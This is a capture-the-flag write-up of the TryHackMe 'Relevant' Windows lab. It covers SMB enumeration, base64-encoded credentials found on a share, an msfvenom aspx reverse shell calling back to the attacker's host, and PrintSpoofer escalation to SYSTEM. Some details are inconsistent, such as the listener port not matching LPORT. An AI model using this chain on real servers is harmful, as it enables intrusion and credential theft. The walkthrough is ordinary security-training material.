# CTF TryHackMe - Revelant

## Nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.0.97
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-29 08:59 CET
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 09:01 (0:00:18 remaining)
Nmap scan report for 10.10.0.97
Host is up (0.097s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE        VERSION
80/tcp   open  http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc          Microsoft Windows RPC
139/tcp  open  netbios-ssn    Microsoft Windows netbios-ssn 
445/tcp  open  microsoft-ds   Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server?
|_ssl-date: 2022-01-29T08:02:13+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2022-01-29T08:01:35+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2022-01-28T07:55:32
|_Not valid after:  2022-07-30T07:55:32
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h35m59s, deviation: 3h34m40s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-01-29T08:01:37
|_  start_date: 2022-01-29T07:56:09
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-01-29T00:01:33-08:00
```

With with nmap Scan, we learn there are multiple open ports 

```
80 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135 RPC
139/445 samba
3389 RDP
```

Our target is **Windows Server 2016 Standard Evaluation 6.3**


## Samba enumeration

```bash
nmap --script "smb-enum-*" -p 445 10.10.0.97
Host script results:
| smb-enum-sessions: 
|_  <nobody>
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.0.97\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.0.97\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.0.97\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.0.97\nt4wrksv: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ/WRITE
```

Nmap has found 4 shares :

```
\\10.10.0.97\ADMIN (NO ACCESS)
\\10.10.0.97\C (NO ACCESS)
\\10.10.0.97\IPC (READ/WRITE)
\\10.10.0.97\nt4wrksv (READ/WRITE)
```

**nt4wrksv** seems to be very interesting. Let's explore what's contain this share.


Using smbclient to connect to the discovered Samba share : 

```bash
smbclient \\\\10.10.0.97\\nt4wrksv\\
Enter WORKGROUP\grib's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jan 29 09:12:38 2022
  ..                                  D        0  Sat Jan 29 09:12:38 2022
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020
```

Great, we get a password file. Downloaded and see what his contain :

```
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
```

Okay, we need to decode those passwords. The passwords seems to be base64 encoded. 

```
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
```

Now we have a valid Username and password.

## Nmap on all port for further enumeration

So, i launched an nmap script on all ports

```bash
nmap -p- -v 10.10.197.47
49663/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
```

I discovered 4 new ports. Let's check this

```
nmap -Pn -p49663,49667,49669 -sC -sV 10.10.197.47
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-29 14:11 CET
Nmap scan report for Relevant (10.10.197.47)
Host is up (0.077s latency).

PORT      STATE SERVICE VERSION
49663/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
49667/tcp open  msrpc   Microsoft Windows RPC
49669/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.51 seconds
```

We have another Microsoft ISS server on port 49663.

## Perform a webdirectory bruteforce

Perform an webdirectory bruteforce 
we found **nt4wrksv** directory


We found the same directory as the samba share. Let's check if we can access to the passwords.txt via IIS

```bash
curl http://10.10.209.212:49663/nt4wrksv/passwords.txt                              
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
```

Remember, we can Write to the samba share. Let's generate a asp/aspx reverse shell with msfvenom


## Generating reverse shell

```bash
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.9.188.66 LPORT=9001 -e x64/shikata_ga_nai -o shell.aspx
```

Then need to curl to call our reverse shell

```bash
curl http://10.10.209.212:49663/nt4wrksv/shell.aspx
```

Start the nc listener

```bash
nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.188.66] from (UNKNOWN) [10.10.209.212] 49881
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>
```

We are in. Now we need to privilege to Administrator.


## Let's privEsc

Frist, list our privileges

```
c:\Users\Bob\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

We can abuse to **SeImpersonatePrivilege** with **PrintSpoofer Windows Privilege**

```
git clone https://github.com/itm4n/PrintSpoofer.git
```


Then, upload our shell on the samba share

```
smbclient \\\\10.10.209.212\\nt4wrksv\\
Enter WORKGROUP\grib's password: 
Try "help" to get a list of possible commands.
smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (4,6 kb/s) (average 4,6 kb/s)
smb: \> dir
  .                                   D        0  Sat Jan 29 15:27:04 2022
  ..                                  D        0  Sat Jan 29 15:27:04 2022
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020
  shell.aspx                          A     2858  Sat Jan 29 15:27:04 2022

                7735807 blocks of size 4096. 4948511 blocks available
```


Go to the web directory

```
c:\windows\system32\inetsrv>cd c:\inetpub\wwwroot\nt4wrksv
```

And then execute the exe file :

```
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```

And we'rrr root !!
